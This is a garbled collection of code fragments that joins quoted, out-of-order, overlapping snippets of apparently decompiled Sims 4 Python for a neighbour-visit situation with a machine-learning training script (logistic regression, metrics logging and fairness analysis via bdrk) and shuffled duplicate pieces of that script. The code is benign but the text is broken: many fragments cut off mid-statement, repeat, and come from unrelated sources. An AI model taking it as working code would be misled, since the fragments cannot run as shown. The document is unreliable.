"class _NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for",
"= SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod def",
"to be greeted.\\n ', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the Sim to",
"import DoubleSimResolver from interactions.utils.loot import LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning from sims4.tuning.instances import",
"def timer_expired(self): for sim_info in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in",
"requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home",
"Sims if this\\n situation state times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will be",
"@classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def __init__(self, *args,",
"state times out.\\n ', tunable=LootActions.TunableReference(description='\\n A loot action applied to all of the",
"BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from situations.situation import Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState,",
"')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will be shown when this situation state times\\n out.\\n",
"= {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for the Sim to knock on the door.\\n ',",
"neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is None: return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id))",
"timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for the Sim to",
"(RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod def _get_neighbor(cls): active_sim_info = services.active_sim_info() neighbors =",
"3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded",
"situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList",
"interactions.utils.loot import LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables from sims4.tuning.tunable",
"= sim.sim_info.relationship_tracker for sim_info in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class",
"= {'early_exit_loot':TunableList(description='\\n A list of loot to apply between the neighbor and the",
"cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim =",
"2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py #",
"if result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None return neighbor_sim_id def start_situation(self):",
"A loot action applied to all of the active household Sims if this\\n",
"between the neighbor and the active\\n household Sims if this stiuation state times",
"_NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list of loot to apply between the neighbor",
"**kwargs) self._neighbor_sim = None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim",
"get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is None: return guest_list",
"import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from situations.situation import Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState,",
"self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A",
"and the active\\n household Sims if this stiuation state times out.\\n ', tunable=LootActions.TunableReference(description='\\n",
"of the active household Sims if this\\n situation state times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n",
"', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the Sim to wait to be",
"self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()),",
"locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the Sim to wait to be greeted.\\n",
"'_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State for the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation',",
"name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22 23:17:14 # Size of source mod 2**32:",
"self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list of loot to apply between",
"(cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod def _get_neighbor(cls): active_sim_info = services.active_sim_info() neighbors",
"ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim,",
"loot action applied to all of the active household Sims if this\\n situation",
"**kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim = None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim",
"SituationGuestList from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState):",
"import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from",
"*args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim = None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type)",
"Notification that will be shown when this situation state times\\n out.\\n ')} def",
"tunable=LootActions.TunableReference(description='\\n A loot action applied to all of the active household Sims if",
"= DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification",
"import SituationGuestInfo, SituationGuestList from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services",
"_states(cls): return (SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state)))",
"random from event_testing.resolver import DoubleSimResolver from interactions.utils.loot import LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning",
"factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)]",
"State for the Sim to wait to be greeted.\\n ', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n",
"**kwargs) relationship_tracker = sim.sim_info.relationship_tracker for sim_info in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return",
"early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs):",
"a while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State for the neighbor.\\n",
"the neighbor and the active\\n household Sims if this stiuation state times out.\\n",
"on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the Sim to",
"services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted())",
"A list of loot to apply between the neighbor and the active\\n household",
"**kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self): for sim_info in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for",
"while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State for the neighbor.\\n ')}",
"Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] #",
"out.\\n ')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot",
"return (SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod",
"factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def __init__(self,",
"guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod",
"from event_testing.resolver import DoubleSimResolver from interactions.utils.loot import LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning from",
"random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None return neighbor_sim_id def start_situation(self): super().start_situation() self._change_state(_StartSituationState()) lock_instance_tunables(NeighborReactToYouSituation, exclusivity=(BouncerExclusivityCategory.NORMAL),",
"def _get_neighbor(cls): active_sim_info = services.active_sim_info() neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for",
"neighbor_sim_infos_at_home else None return neighbor_sim_id def start_situation(self): super().start_situation() self._change_state(_StartSituationState()) lock_instance_tunables(NeighborReactToYouSituation, exclusivity=(BouncerExclusivityCategory.NORMAL), creation_ui_option=(SituationCreationUIOption.NOT_AVAILABLE), duration=0,",
"if not neighbors: return neighbor_sim_infos_at_home = [result.sim_info for result in neighbors if result.sim_info.is_at_home]",
"list of loot to apply between the neighbor and the active\\n household Sims",
"allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home =",
"True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State for the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff',",
"_StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker for",
"at: 2018-07-22 23:17:14 # Size of source mod 2**32: 9737 bytes import random",
"loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState):",
"sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home = [result.sim_info for result",
"situations.situation import Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from",
"sim @classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is",
"self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class",
"def _states(cls): return (SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState,",
"the Sim to hang out for a while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job"
] |
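# For orientation, the situation above is a four-state machine. The toy class
# below is a minimal, self-contained sketch of that flow in plain Python; it
# uses no game APIs, and every name in it is illustrative rather than part of
# the Sims 4 codebase. The start state routes straight to hanging out when a
# household Sim has already been given a key; otherwise the flow is
# knock -> wait-to-be-greeted -> hangout, and a timeout while waiting applies
# the early-exit loot before the situation ends.
class ToyNeighborSituation:

    def __init__(self, has_key_to_home):
        self.has_key_to_home = has_key_to_home
        self.state = 'start'
        self.alive = True

    def start(self):
        # Mirrors _StartSituationState._on_set_sim_role_state.
        self.state = 'hangout' if self.has_key_to_home else 'knock_on_door'

    def interaction_complete(self):
        # Mirrors _on_interaction_of_interest_complete in each state.
        if self.state == 'knock_on_door':
            self.state = 'wait_to_be_greeted'
        elif self.state == 'wait_to_be_greeted':
            self.state = 'hangout'

    def timer_expired(self):
        # Mirrors timer_expired: only the wait state applies loot and
        # notifies; every timeout path destroys the situation.
        if self.state == 'wait_to_be_greeted':
            print('apply early-exit loot, show notification')
        self.alive = False


toy = ToyNeighborSituation(has_key_to_home=False)
toy.start()                 # -> knock_on_door
toy.interaction_complete()  # -> wait_to_be_greeted
toy.interaction_complete()  # -> hangout
toy.timer_expired()         # -> situation ends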
from typing import Tuple

import bdrk
import joblib
import numpy as np
import pandas as pd
from bdrk.model_analyzer import ModelAnalyzer, ModelTypes
from boxkite.monitoring.collector import (
    BaselineMetricCollector,
    FeatureHistogramCollector,
    InferenceHistogramCollector
)
from boxkite.monitoring.encoder import MetricEncoder
from environs import Env
from sklearn import metrics
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder, StandardScaler

env = Env()
OUTPUT_MODEL_PATH = env("OUTPUT_MODEL_PATH")
TRAIN_DATA_PATH = env("TRAIN_DATA_PATH")
TEST_DATA_PATH = env("TEST_DATA_PATH")
C = env.float("C")

CONFIG_FAI = {
    "large_rings": {
        "privileged_attribute_values": [1],
        # privileged group name corresponding to values=[1]
        "privileged_group_name": "Large",
        "unprivileged_attribute_values": [0],
        # unprivileged group name corresponding to values=[0]
        "unprivileged_group_name": "Small",
    }
}


def load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]:
    """Loads the dataset and returns the features as a pandas dataframe
    and the target variable as a numpy array.

    :param filepath: Path to load the data
    :type filepath: str
    :param target: Target variable
    :type target: str
    :return: The features pandas dataframe and the target numpy array
    :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray]
    """
    df = pd.read_csv(filepath)
    df['large_rings'] = (df['Rings'] > 10).astype(int)
    # Ensure nothing missing
    original_len = len(df)
    df.dropna(how="any", axis=0, inplace=True)
    num_rows_dropped = original_len - len(df)
    if num_rows_dropped > 0:
        print(f"Warning - dropped {num_rows_dropped} rows with NA data.")
    y = df[target].values
    df.drop(target, axis=1, inplace=True)
    return df, y


def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float = 0, C: float = 1, verbose: bool = False) -> Pipeline:
    """Scales the features and trains a logistic regression model.

    :param X: Features for training
    :type X: pandas.core.frame.DataFrame
    :param y: Target variable
    :type y: numpy.ndarray
    :param seed: `random_state` for logistic regression model
    :type seed: float
    :param C: Inverse of regularization strength
    :type C: float
    :param verbose: Whether to print additional info
    :type verbose: bool
    :return: Pipeline of transforms with a trained final estimator
    :rtype: sklearn.pipeline.Pipeline
    """
    verbose and print('\nTRAIN\nScaling...')
    scaling = StandardScaler()
    X = scaling.fit_transform(X)
    verbose and print('Fitting...')
    verbose and print('C:', C)
    model = LogisticRegression(random_state=seed, C=C, max_iter=4000)
    model.fit(X, y)
    verbose and print('Chaining pipeline...')
    pipe = Pipeline([('scaling', scaling), ('model', model)])
    verbose and print('Done training.')
    return pipe


def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray):
    """Computes, prints and logs metrics.

    :param pipe: Pipeline of transforms with a trained final estimator
    :type pipe: sklearn.pipeline.Pipeline
    :param x_test: Features for testing
    :type x_test: pandas.core.frame.DataFrame
    :param y_test: Target variable data for testing
    :type y_test: numpy.ndarray
    :param y_test_onehot: One hot encoded target variable data
    :type y_test_onehot: numpy.ndarray
    :return: Test predicted probability and predictions
    :rtype: tuple[numpy.ndarray, numpy.ndarray]
    """
    test_prob = pipe.predict_proba(x_test)
    test_pred = pipe.predict(x_test)

    acc = metrics.accuracy_score(y_test, test_pred)
    precision = metrics.precision_score(y_test, test_pred, average='macro')
    recall = metrics.recall_score(y_test, test_pred, average='macro')
    f1_score = metrics.f1_score(y_test, test_pred, average='macro')
    roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr')
    avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro')
    print("\nEVALUATION\n"
          f"\tAccuracy = {acc:.4f}\n"
          f"\tPrecision (macro) = {precision:.4f}\n"
          f"\tRecall (macro) = {recall:.4f}\n"
          f"\tF1 score (macro) = {f1_score:.4f}\n"
          f"\tROC AUC (macro) = {roc_auc:.4f}\n"
          f"\tAverage precision (macro) = {avg_prc:.4f}")

    # Bedrock Logger: captures model metrics
    bdrk.log_metrics(
        {
            "Accuracy": acc,
            "Precision (macro)": precision,
            "Recall (macro)": recall,
            "F1 Score (macro)": f1_score,
            "ROC AUC (macro)": roc_auc,
            "Avg precision (macro)": avg_prc,
        }
    )

    # `log_chart_data` assumes binary classification
    # For multiclass labels, we can use a "micro-average" by
    # quantifying score on all classes jointly
    # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html  # noqa: E501
    # This will allow us to use the same `log_chart_data` method
    bdrk.log_binary_classifier_metrics(
        y_test_onehot.ravel().astype(int).tolist(),  # list of int
        test_prob.ravel().astype(float).tolist()  # list of float
    )
    return test_prob, test_pred


def main():
    x_train, y_train = load_dataset(
        filepath=TRAIN_DATA_PATH,
        target='Type'
    )
    x_test, y_test = load_dataset(
        filepath=TEST_DATA_PATH,
        target='Type'
    )
    print('X (train)')
    print(x_train)

    # sklearn `roc_auc_score` and `average_precision_score` expect
    # binary label indicators with shape (n_samples, n_classes)
    enc = OneHotEncoder(handle_unknown='ignore', sparse=False)
    y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1))
    # Use transform (not fit_transform) so the test labels reuse the
    # categories learned from the training labels.
    y_test_onehot = enc.transform(y_test.reshape(-1, 1))
    print('\nCATEGORIES')
    for value, category in enumerate(enc.categories_[0]):
        print(f'{category} : {value}')

    # Convert target variable to numeric values
    # ModelMonitoringService.export_text expects both features
    # and inference to be numeric values
    y_train = np.argmax(y_train_onehot, axis=1)
    y_test = np.argmax(y_test_onehot, axis=1)

    pipe = train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True)

    # Save trained model
    feature_names = x_train.columns.tolist()
    print("\nSAMPLE FEATURES")
    print({
        feature_name: str(x_train[feature_name][0])
        for feature_name in feature_names
    })
    joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH)
    print('\nSaved trained one hot encoder and logistic regression model.')

    test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot)

    # Save feature and inference distribution
    train_predicted = pipe.predict(x_train).flatten().tolist()
    collectors = [
        FeatureHistogramCollector(
            data=x_train.iteritems(),
            discrete={7, 8},  # Specify which column indices are discrete
        ),
        # Specify inference as discrete
        InferenceHistogramCollector(data=train_predicted, is_discrete=True)
    ]
    encoder = MetricEncoder(collectors=collectors)
    with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, "wb") as f:
        f.write(encoder.as_text())
    print('Saved feature and inference distribution.')

    # Train Shap model and calculate xafai (explainability and fairness) metrics
    analyzer = (
        ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR)
        .test_features(x_test)
        .fairness_config(CONFIG_FAI)
        .test_labels(y_test)
        .test_inference(test_pred)
    )
    analyzer.analyze()
    print('Saved Shap model and fairness results.')


if __name__ == '__main__':
    bdrk.init()
    with bdrk.start_run():
        main()
"= np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) # Save trained",
"for feature_name in feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one hot",
"as a pandas dataframe and the target variable as a numpy array. :param",
"float :param C: Inverse of regularization strength :type C: float :param verbose: Whether",
"y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) # sklearn `roc_auc_score` and",
"returns the features as a pandas dataframe and the target variable as a",
"X: Features for training :type X: pandas.core.frame.DataFrame :param y: Target variable :type y:",
"bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from",
"print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1",
"# binary label indicators with shape (n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot",
"acc = metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred,",
"print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X = scaling.fit_transform(X) verbose and print('Fitting...') verbose and print('C:',",
"- dropped {num_rows_dropped} rows with NA data.\") y = df[target].values df.drop(target, axis=1, inplace=True)",
"values=[0] \"unprivileged_group_name\": \"Small\", } } def load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]:",
"Convert target variable to numeric values # ModelMonitoringService.export_text expect both features # and",
"collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which column indices are",
"and log metrics. :param pipe: Pipeline of transforms with a trained final estimator",
"use a \"micro-average\" by # quantifying score on all classes jointly # See",
"len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped = original_len - len(df) if num_rows_dropped > 0:",
"Computes, prints and log metrics. :param pipe: Pipeline of transforms with a trained",
"\"Precision (macro)\": precision, \"Recall (macro)\": recall, \"F1 Score (macro)\": f1_score, \"ROC AUC (macro)\":",
"metrics. :param pipe: Pipeline of transforms with a trained final estimator :type pipe:",
"<reponame>kesamet/examples<gh_stars>1-10 import joblib from typing import Tuple import bdrk import numpy as np",
"boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import MetricEncoder from environs",
"Inverse of regularization strength :type C: float :param verbose: Whether to print additional",
"data :type y_test_onehot: numpy.ndarray :return: Test predicted probability and predictions :rtype: tuple[numpy.ndarray, numpy.ndarray]",
") from boxkite.monitoring.encoder import MetricEncoder from environs import Env from sklearn import metrics",
"inference as discrete ] encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text())",
"= Pipeline([('scaling', scaling), ('model', model)]) verbose and print('Done training.') return pipe def compute_log_metrics(pipe:",
"typing import Tuple import bdrk import numpy as np import pandas as pd",
"> 10).astype(int) # Ensure nothing missing original_len = len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped",
"C) model = LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y) verbose and print('Chaining pipeline...') pipe",
"y_test = np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) # Save",
"Pipeline: \"\"\" Scales the features and trains a logistic regression model. :param X:",
"print(f\"Warning - dropped {num_rows_dropped} rows with NA data.\") y = df[target].values df.drop(target, axis=1,",
"all classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This will allow",
"= { \"large_rings\": { \"privileged_attribute_values\": [1], # privileged group name corresponding to values=[1]",
"from sklearn.pipeline import Pipeline from sklearn.preprocessing import OneHotEncoder, StandardScaler env = Env() OUTPUT_MODEL_PATH",
"for value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert target variable to",
"Pipeline([('scaling', scaling), ('model', model)]) verbose and print('Done training.') return pipe def compute_log_metrics(pipe: Pipeline,",
") x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) # sklearn",
"{f1_score:.4f}\\n\" f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\") # Bedrock",
"# privileged group name corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], # unprivileged",
"array. :param filepath: Path to load the data :type filepath: str :param target:",
"avg_prc, } ) # `log_chart_data` assumes binary classification # For multiclass labels, we",
"model.fit(X, y) verbose and print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling), ('model', model)]) verbose",
"load the data :type filepath: str :param target: Target variable :type target: str",
"= metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred,",
"\"unprivileged_group_name\": \"Small\", } } def load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\"",
"y_test: numpy.ndarray :param y_test_onehot: One hot encoded target variable data :type y_test_onehot: numpy.ndarray",
"( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import MetricEncoder from environs import Env",
"\"F1 Score (macro)\": f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg precision (macro)\": avg_prc, }",
"score (macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) =",
"a trained final estimator :type pipe: sklearn.pipeline.Pipeline :param x_test: Features for testing :type",
"the features as a pandas dataframe and the target variable as a numpy",
"dropped {num_rows_dropped} rows with NA data.\") y = df[target].values df.drop(target, axis=1, inplace=True) return",
"bool :return: Pipeline of transforms with a trained final estimator :rtype: sklearn.pipeline.Pipeline \"\"\"",
"logistic regression model.') test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot) # Save feature",
"MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text()) print('Saved feature and inference distribution.') #",
") analyzer.analyze() print('Saved Shap model and fairness results.') if __name__ == '__main__': bdrk.init()",
"sklearn `roc_auc_score` and `average_precision_score` expects # binary label indicators with shape (n_samples, n_classes)",
"recall, \"F1 Score (macro)\": f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg precision (macro)\": avg_prc,",
